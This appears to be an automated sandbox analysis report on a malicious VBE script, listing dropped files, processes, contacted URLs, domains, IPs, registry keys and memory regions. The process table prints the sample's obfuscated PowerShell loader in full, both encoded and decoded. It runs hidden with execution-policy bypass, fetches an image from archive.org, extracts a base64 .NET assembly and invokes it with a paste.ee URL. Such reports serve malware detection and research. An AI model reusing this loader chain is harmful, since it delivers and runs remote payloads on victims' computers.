Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
10092024150836 09.10.2024.vbe
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\-400GIK8
|
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie
0x37, schema 4, UTF-8, version-valid-for 8
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4w34uggz.qfr.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ar13yekm.dvc.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g0mfx1ro.0w2.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uij3me5i.nav.psm1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\10092024150836 09.10.2024.vbe"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJGVudjpjb21zcEVjWzQsMjYsMjVdLUpPSU4nJykoICgoJ3swfWltJysnYWdlVXJsID0gezF9aHR0cHM6Ly9pYTYwMDEwJysnMi51cy5hcmNoaXZlLm9yZy8zMi9pdGUnKydtcy9kZXRhaC1ub3RlLXZfMjAyNDEwL0RlJysndGFoTm90ZScrJ19WLmpwZyB7MX07ezB9d2ViQ2xpZW50ID0gJysnTmV3LU9iaicrJ2VjdCBTeXN0ZW0uTmV0LldlYkNsaScrJ2UnKydudDt7MH1pbWFnZUJ5dGVzID0gezB9d2ViQ2xpZW4nKyd0LkRvd25sb2FkRGF0JysnYSh7MH1pbWFnZVVybCk7ezB9aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZScrJ3RTdHJpbmcoezB9aW1hZ2VCeXRlcyk7ezB9cycrJ3RhcnRGbGFnID0gezF9PDxCQVNFNjRfU1RBUlQ+PnsxfTt7MH1lbmRGbGFnID0gezF9PDxCQVNFJysnNjRfRU5EPj57MX07ezB9c3RhcnRJbmRleCA9IHswfWltYWdlVGV4dC5JbmRleE9mKHswfXN0YXJ0RmxhZyk7ezB9ZW5kSW5kZXggPSB7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1lbmRGbGFnKTt7MH1zdGFydEluZGV4IC1nZSAwIC1hbmQgeycrJzB9ZW5kSW5kZXggLWd0IHswfXN0YXJ0SW5kZXg7ezB9c3RhcnRJbmRleCArPSB7MH1zdGFydEZsYWcuTGVuZ3QnKydoO3swfWJhc2U2NExlbmd0aCA9IHswfWVuZEluZGV4IC0gezB9c3RhcnRJbmRleDt7MH1iYXNlNjRDb21tYW5kID0gezB9aW1hZ2VUZXh0LlN1YnN0cmluZyh7MH1zdGFydEluZGV4LCcrJyB7MH1iYXNlNjRMZW5ndGgpO3swfWNvbW1hbmRCeXRlcyA9IFtTeXN0JysnZW0uQ29udmVydF06OkZybycrJ21CYXNlNjRTdHJpbmcoezB9JysnYmFzZTY0Q29tbWFuZCk7ezB9bG9hJysnZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdGVtLlJlZmxlY3Rpb24uQScrJ3NzZW1ibHldOjpMb2FkKHswfWNvbW1hbmRCeXRlcyk7ezB9dmFpTWV0aG9kID0gW2RubGliLicrJ0lPLkhvbWUnKyddLkdldE1ldGhvZCh7MX1WQUl7MX0pO3swfXZhaU1ldGhvZC5JbnZva2UoezB9bnVsbCwgQCcrJyh7MX0wL2hCUEZtL2QvZWUuZXRzYXAvLzpzcHR0aHsxfScrJywgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdicrJ2Fkb3sxfSwgezF9MXsxfSwgezF9YXBwaWR0ZWx7MScrJ30pKTsnKSAtZiAgW2NIQXJdMzYsW2NIQXJdMzkpKQ==';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
".( $env:comspEc[4,26,25]-JOIN'')( (('{0}im'+'ageUrl = {1}https://ia60010'+'2.us.archive.org/32/ite'+'ms/detah-note-v_202410/De'+'tahNote'+'_V.jpg
{1};{0}webClient = '+'New-Obj'+'ect System.Net.WebCli'+'e'+'nt;{0}imageBytes = {0}webClien'+'t.DownloadDat'+'a({0}imageUrl);{0}imageText
= [System.Text.Encoding]::UTF8.Ge'+'tString({0}imageBytes);{0}s'+'tartFlag = {1}<<BASE64_START>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex
= {0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endFlag);{0}startIndex -ge 0 -and {'+'0}endIndex
-gt {0}startIndex;{0}startIndex += {0}startFlag.Lengt'+'h;{0}base64Length = {0}endIndex - {0}startIndex;{0}base64Command =
{0}imageText.Substring({0}startIndex,'+' {0}base64Length);{0}commandBytes = [Syst'+'em.Convert]::Fro'+'mBase64String({0}'+'base64Command);{0}loa'+'dedAssemb'+'ly
= '+'[System.Reflection.A'+'ssembly]::Load({0}commandBytes);{0}vaiMethod = [dnlib.'+'IO.Home'+'].GetMethod({1}VAI{1});{0}vaiMethod.Invoke({0}null,
@'+'({1}0/hBPFm/d/ee.etsap//:sptth{1}'+', {1}desativado{1}, {1}desativado{1}, {1}desativado{1}, {1}desativ'+'ado{1}, {1}1{1},
{1}appidtel{1'+'}));') -f [cHAr]36,[cHAr]39))"
|
|
|
|
C:\Windows\SysWOW64\appidtel.exe
|
"C:\Windows\SysWOW64\appidtel.exe"
|
|
|
|
C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe
|
"C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe"
|
|
|
|
C:\Windows\SysWOW64\dllhost.exe
|
"C:\Windows\SysWOW64\dllhost.exe"
|
|
|
|
C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe
|
"C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe"
|
|
|
|
C:\Program Files\Mozilla Firefox\firefox.exe
|
"C:\Program Files\Mozilla Firefox\Firefox.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://www.airgame.store/ojib/?-Xr8=9xYabYlQOuR2q+ns8Lzx9bRF8NZUoInv7x1TfUGCdfPrsqjtDMlDvLTTdBF+pu/1Frk+h/DxANwT0Hfs8j1jMkaM33w5ilCaxHtuGNiB0DtKNuQLcX24gGfpbrwRywwLDdzHNLM=&mBsxM=YJ0LnZ68
|
188.114.96.3
|
|
|
|
https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpg
|
207.241.227.242
|
|
|
|
https://paste.ee/d/mFPBh/0
|
188.114.96.3
|
|
|
|
http://www.568060007.xyz/2jpw/
|
18.163.12.6
|
|
|
|
http://www.568060007.xyz/2jpw/?-Xr8=qz9UzJ10+p/cjPnRdZlHv4YDQxf45KubwzSEjjTwjD/nUvv1s93evwIp+LTko4UKBcY0h9JnEtV5jsbq23POiYFTmg8OGBnfOhN/rQscVBLiXL1oe2kzRKc9D7hJiq/ZgM9Sylw=&mBsxM=YJ0LnZ68
|
18.163.12.6
|
|
|
|
http://www.elitecbdgummies.net/iaoq/
|
172.96.186.204
|
|
|
|
http://www.airgame.store/ojib/
|
188.114.96.3
|
|
|
|
https://duckduckgo.com/chrome_newtab
|
unknown
|
||
|
https://duckduckgo.com/ac/?q=
|
unknown
|
||
|
https://securepubads.g.doubleclick.net/tag/js/gpt.js
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://analytics.paste.ee
|
unknown
|
||
|
https://paste.ee
|
unknown
|
||
|
https://aka.ms/pscore6
|
unknown
|
||
|
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
|
unknown
|
||
|
http://ia600102.us.archive.org
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://oneget.orgX
|
unknown
|
||
|
https://cdnjs.cloudflare.com
|
unknown
|
||
|
https://cdnjs.cloudflare.com;
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpgX
|
unknown
|
||
|
https://secure.gravatar.com
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://paste.ee
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
http://www.autoclean.shop/fx9f/?mBsxM=YJ0LnZ68&-Xr8=yLkskDR0nY0t6IEYTVnouV0HkzfvHuAPmfbD5h8cln4aJalo4AVzLarmhH7o5TO/QYT7rLdNwPAjvarY55z4bEJvcGnuntwn6BS5zidhK+0y0eRY5oQOsBmzZX59GbhTRCQZQus=
|
13.248.169.48
|
||
|
https://go.micro
|
unknown
|
||
|
http://www.airgame.store
|
unknown
|
||
|
https://www.google.com;
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
|
unknown
|
||
|
https://ia600102.us.arX
|
unknown
|
||
|
https://www.ecosia.org/newtab/
|
unknown
|
||
|
https://ia600102.us.archive.org
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://ac.ecosia.org/autocomplete?q=
|
unknown
|
||
|
https://playchill.top/api/axgames/request?domain=$
|
unknown
|
||
|
https://gamesfunny.top$
|
unknown
|
||
|
https://code.jquery.com/jquery-3.5.1.min.js
|
unknown
|
||
|
https://analytics.paste.ee;
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
|
unknown
|
||
|
https://themes.googleusercontent.com
|
unknown
|
||
|
https://oneget.org
|
unknown
|
There are 41 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
elitecbdgummies.net
|
172.96.186.204
|
|
|
|
568060007.xyz
|
18.163.12.6
|
|
|
|
ia600102.us.archive.org
|
207.241.227.242
|
|
|
|
paste.ee
|
188.114.96.3
|
|
|
|
www.airgame.store
|
188.114.96.3
|
|
|
|
1ns6mg.vip
|
3.33.130.190
|
|
|
|
www.elitecbdgummies.net
|
unknown
|
|
|
|
www.568060007.xyz
|
unknown
|
|
|
|
www.1ns6mg.vip
|
unknown
|
|
|
|
www.autoclean.shop
|
13.248.169.48
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
18.163.12.6
|
568060007.xyz
|
United States
|
|
|
|
188.114.96.3
|
paste.ee
|
European Union
|
|
|
|
207.241.227.242
|
ia600102.us.archive.org
|
United States
|
|
|
|
172.96.186.204
|
elitecbdgummies.net
|
Canada
|
|
|
|
13.248.169.48
|
www.autoclean.shop
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
3750000
|
unclassified section
|
page execute and read and write
|
|
|
|
400000
|
remote allocation
|
page execute and read and write
|
|
|
|
3580000
|
trusted library allocation
|
page read and write
|
|
|
|
53E0000
|
system
|
page execute and read and write
|
|
|
|
3330000
|
trusted library allocation
|
page read and write
|
|
|
|
B20000
|
system
|
page execute and read and write
|
|
|
|
2DF0000
|
unkown
|
page execute and read and write
|
|
|
|
3080000
|
system
|
page execute and read and write
|
|
|
|
1061000
|
unkown
|
page readonly
|
||
|
1FEA5C51000
|
trusted library allocation
|
page read and write
|
||
|
1F927210000
|
trusted library allocation
|
page read and write
|
||
|
214FD031000
|
heap
|
page read and write
|
||
|
214FB13F000
|
heap
|
page read and write
|
||
|
3392000
|
heap
|
page read and write
|
||
|
1F915570000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
E20000
|
unkown
|
page readonly
|
||
|
32A4000
|
heap
|
page read and write
|
||
|
15C8A0C0000
|
heap
|
page read and write
|
||
|
865F000
|
stack
|
page read and write
|
||
|
1050000
|
unkown
|
page read and write
|
||
|
A99F48D000
|
stack
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
1F91552B000
|
heap
|
page read and write
|
||
|
384A000
|
unkown
|
page read and write
|
||
|
1F91735A000
|
trusted library allocation
|
page read and write
|
||
|
214FCFB7000
|
heap
|
page read and write
|
||
|
1F91731E000
|
trusted library allocation
|
page read and write
|
||
|
1230000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
D5E39FF000
|
stack
|
page read and write
|
||
|
7F6A000
|
heap
|
page read and write
|
||
|
15C8A0DC000
|
heap
|
page read and write
|
||
|
1F92F3CD000
|
heap
|
page read and write
|
||
|
69C000
|
stack
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
214FCFBF000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
3486000
|
heap
|
page read and write
|
||
|
214FCF7E000
|
heap
|
page read and write
|
||
|
214FB17D000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
7FFD346F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD349B0000
|
trusted library allocation
|
page read and write
|
||
|
A99E63F000
|
stack
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
1FEA6233000
|
trusted library allocation
|
page read and write
|
||
|
1FEA6C45000
|
trusted library allocation
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
1F9155F0000
|
heap
|
page read and write
|
||
|
214FD081000
|
heap
|
page read and write
|
||
|
1F917296000
|
trusted library allocation
|
page read and write
|
||
|
1FEA4030000
|
trusted library allocation
|
page read and write
|
||
|
2DBA000
|
heap
|
page read and write
|
||
|
54BB000
|
system
|
page execute and read and write
|
||
|
13E000
|
unkown
|
page readonly
|
||
|
214FB3DA000
|
heap
|
page read and write
|
||
|
1FEA7570000
|
trusted library allocation
|
page read and write
|
||
|
214FD07B000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
1FEA6047000
|
trusted library allocation
|
page read and write
|
||
|
2B0C000
|
stack
|
page read and write
|
||
|
214FB1D4000
|
heap
|
page read and write
|
||
|
214FB1FD000
|
heap
|
page read and write
|
||
|
B84000
|
heap
|
page read and write
|
||
|
1FEB5C61000
|
trusted library allocation
|
page read and write
|
||
|
1FEB7A69000
|
trusted library allocation
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
FF0000
|
heap
|
page read and write
|
||
|
214FB1BD000
|
heap
|
page read and write
|
||
|
1F915473000
|
heap
|
page read and write
|
||
|
7F56000
|
heap
|
page read and write
|
||
|
7FFD34940000
|
trusted library allocation
|
page read and write
|
||
|
6DCC37E000
|
stack
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
7FFD349FC000
|
trusted library allocation
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
2B6E000
|
stack
|
page read and write
|
||
|
214FCF3A000
|
heap
|
page read and write
|
||
|
103E000
|
stack
|
page read and write
|
||
|
7FFD3480A000
|
trusted library allocation
|
page read and write
|
||
|
1F917324000
|
trusted library allocation
|
page read and write
|
||
|
214FCFC8000
|
heap
|
page read and write
|
||
|
3300000
|
heap
|
page read and write
|
||
|
7FFD34820000
|
trusted library allocation
|
page execute and read and write
|
||
|
214FB1F6000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
341B000
|
heap
|
page read and write
|
||
|
7FFD34940000
|
trusted library allocation
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
B84000
|
heap
|
page read and write
|
||
|
397E000
|
direct allocation
|
page execute and read and write
|
||
|
214FCFBF000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
11C0000
|
unkown
|
page read and write
|
||
|
3680000
|
trusted library allocation
|
page execute and read and write
|
||
|
B50000
|
unkown
|
page readonly
|
||
|
303B000
|
stack
|
page read and write
|
||
|
9F02000
|
system
|
page read and write
|
||
|
33E8000
|
heap
|
page read and write
|
||
|
214FB3D8000
|
heap
|
page read and write
|
||
|
214FCFC3000
|
heap
|
page read and write
|
||
|
1FEBDE67000
|
heap
|
page read and write
|
||
|
214FB1FD000
|
heap
|
page read and write
|
||
|
1FEA3EDF000
|
heap
|
page read and write
|
||
|
1210000
|
unkown
|
page read and write
|
||
|
3411000
|
heap
|
page read and write
|
||
|
56851FF000
|
stack
|
page read and write
|
||
|
EFC000
|
stack
|
page read and write
|
||
|
147000
|
unkown
|
page readonly
|
||
|
7F90000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
A99E6B8000
|
stack
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
214FCF41000
|
heap
|
page read and write
|
||
|
7FFD347FA000
|
trusted library allocation
|
page read and write
|
||
|
1F915430000
|
heap
|
page read and write
|
||
|
8050000
|
trusted library allocation
|
page read and write
|
||
|
16C0000
|
unkown
|
page readonly
|
||
|
1FEA602E000
|
trusted library allocation
|
page read and write
|
||
|
214FCF31000
|
heap
|
page read and write
|
||
|
214FCF7B000
|
heap
|
page read and write
|
||
|
56849FB000
|
stack
|
page read and write
|
||
|
1F917269000
|
trusted library allocation
|
page read and write
|
||
|
1F915477000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
2DC0000
|
heap
|
page read and write
|
||
|
3462000
|
heap
|
page read and write
|
||
|
1F91780C000
|
trusted library allocation
|
page read and write
|
||
|
6DCC1FF000
|
stack
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
1F91730A000
|
trusted library allocation
|
page read and write
|
||
|
15C8BC03000
|
trusted library allocation
|
page read and write
|
||
|
214FD086000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
1FEA4070000
|
heap
|
page read and write
|
||
|
9F5C000
|
system
|
page read and write
|
||
|
33ED000
|
heap
|
page read and write
|
||
|
7FFD34650000
|
trusted library allocation
|
page read and write
|
||
|
1F92F315000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
15C8BD01000
|
trusted library allocation
|
page read and write
|
||
|
6DCC87B000
|
stack
|
page read and write
|
||
|
A99E738000
|
stack
|
page read and write
|
||
|
2C6F000
|
stack
|
page read and write
|
||
|
3310000
|
heap
|
page read and write
|
||
|
1FEA769C000
|
trusted library allocation
|
page read and write
|
||
|
131000
|
unkown
|
page execute read
|
||
|
FE0000
|
unkown
|
page readonly
|
||
|
1F9154B8000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
214FB1F6000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
214FB1BF000
|
heap
|
page read and write
|
||
|
3339000
|
direct allocation
|
page execute and read and write
|
||
|
6DB000
|
stack
|
page read and write
|
||
|
1060000
|
unkown
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
214FCF9A000
|
heap
|
page read and write
|
||
|
7FFD34900000
|
trusted library allocation
|
page read and write
|
||
|
1190000
|
heap
|
page read and write
|
||
|
3763000
|
heap
|
page read and write
|
||
|
1F915524000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
D5E34FA000
|
stack
|
page read and write
|
||
|
7FFD3464D000
|
trusted library allocation
|
page execute and read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
6DCBDEF000
|
stack
|
page read and write
|
||
|
3394000
|
unkown
|
page read and write
|
||
|
214FCFC6000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
6DCC6FE000
|
stack
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
6DCC17F000
|
stack
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
214FCFBF000
|
heap
|
page read and write
|
||
|
214FCF5E000
|
heap
|
page read and write
|
||
|
7FFD34920000
|
trusted library allocation
|
page read and write
|
||
|
B40000
|
unkown
|
page readonly
|
||
|
214FCF30000
|
heap
|
page read and write
|
||
|
1FEA7333000
|
trusted library allocation
|
page read and write
|
||
|
15C8A0EB000
|
heap
|
page read and write
|
||
|
131000
|
unkown
|
page execute read
|
||
|
7FFD349C0000
|
trusted library allocation
|
page read and write
|
||
|
15C8B8C0000
|
trusted library allocation
|
page read and write
|
||
|
1F91754A000
|
trusted library allocation
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
15C8A090000
|
heap
|
page read and write
|
||
|
214FB110000
|
heap
|
page read and write
|
||
|
7FFD34810000
|
trusted library allocation
|
page execute and read and write
|
||
|
214FB1F6000
|
heap
|
page read and write
|
||
|
7C0000
|
heap
|
page read and write
|
||
|
131000
|
unkown
|
page execute read
|
||
|
6DCC3FE000
|
stack
|
page read and write
|
||
|
1F915491000
|
heap
|
page read and write
|
||
|
7FFD34980000
|
trusted library allocation
|
page read and write
|
||
|
15C8BDC4000
|
trusted library allocation
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
15C89EB0000
|
system
|
page execute and read and write
|
||
|
1FEA3EDD000
|
heap
|
page read and write
|
||
|
4462000
|
unclassified section
|
page execute and read and write
|
||
|
1FEBE0EC000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
1FEBE054000
|
heap
|
page read and write
|
||
|
37D8000
|
heap
|
page read and write
|
||
|
119F000
|
stack
|
page read and write
|
||
|
1FEA3F1A000
|
heap
|
page read and write
|
||
|
3B32000
|
unclassified section
|
page read and write
|
||
|
6DCC07E000
|
stack
|
page read and write
|
||
|
1F92F580000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
7FFD347F1000
|
trusted library allocation
|
page read and write
|
||
|
1F9154BA000
|
heap
|
page read and write
|
||
|
7FFD348D0000
|
trusted library allocation
|
page read and write
|
||
|
3380000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
124F000
|
heap
|
page read and write
|
||
|
33ED000
|
heap
|
page read and write
|
||
|
1FEA603A000
|
trusted library allocation
|
page read and write
|
||
|
7F60000
|
heap
|
page read and write
|
||
|
1F917321000
|
trusted library allocation
|
page read and write
|
||
|
2CD2000
|
unkown
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
1FEA7326000
|
trusted library allocation
|
page read and write
|
||
|
6DCC67F000
|
stack
|
page read and write
|
||
|
1FEA623B000
|
trusted library allocation
|
page read and write
|
||
|
2CE4000
|
heap
|
page read and write
|
||
|
85DF000
|
stack
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
7FFD34950000
|
trusted library allocation
|
page read and write
|
||
|
214FCFA3000
|
heap
|
page read and write
|
||
|
15C8BDAC000
|
trusted library allocation
|
page read and write
|
||
|
7FCB000
|
heap
|
page read and write
|
||
|
214FCFBC000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
214FCFBF000
|
heap
|
page read and write
|
||
|
1FEA6245000
|
trusted library allocation
|
page read and write
|
||
|
A99DFE2000
|
stack
|
page read and write
|
||
|
7FFD3466B000
|
trusted library allocation
|
page read and write
|
||
|
7FFD347F0000
|
trusted library allocation
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
A99E93E000
|
stack
|
page read and write
|
||
|
32A0000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
1F917361000
|
trusted library allocation
|
page read and write
|
||
|
214FCFAB000
|
heap
|
page read and write
|
||
|
214FCFC8000
|
heap
|
page read and write
|
||
|
869E000
|
stack
|
page read and write
|
||
|
1FEA7337000
|
trusted library allocation
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
1180000
|
unkown
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
1F9155E0000
|
heap
|
page execute and read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
7FFD34930000
|
trusted library allocation
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
730000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
2DB8000
|
heap
|
page read and write
|
||
|
33AE000
|
direct allocation
|
page execute and read and write
|
||
|
2D00000
|
unkown
|
page readonly
|
||
|
3481000
|
heap
|
page read and write
|
||
|
7FFD34840000
|
trusted library allocation
|
page read and write
|
||
|
86DF000
|
stack
|
page read and write
|
||
|
1FEA3FE0000
|
heap
|
page read and write
|
||
|
7FFD34801000
|
trusted library allocation
|
page read and write
|
||
|
1FEBE0B8000
|
heap
|
page read and write
|
||
|
7FFD34760000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FEA3EF1000
|
heap
|
page read and write
|
||
|
A99E4FE000
|
stack
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
130000
|
unkown
|
page readonly
|
||
|
1F915526000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
214FCFBF000
|
heap
|
page read and write
|
||
|
1FEA4040000
|
heap
|
page readonly
|
||
|
214FCFD1000
|
heap
|
page read and write
|
||
|
2CF0000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
1F9176FC000
|
trusted library allocation
|
page read and write
|
||
|
B20000
|
direct allocation
|
page read and write
|
||
|
214FD081000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
1F915470000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
34E1000
|
direct allocation
|
page execute and read and write
|
||
|
3210000
|
direct allocation
|
page execute and read and write
|
||
|
550F000
|
system
|
page execute and read and write
|
||
|
1FEA61E1000
|
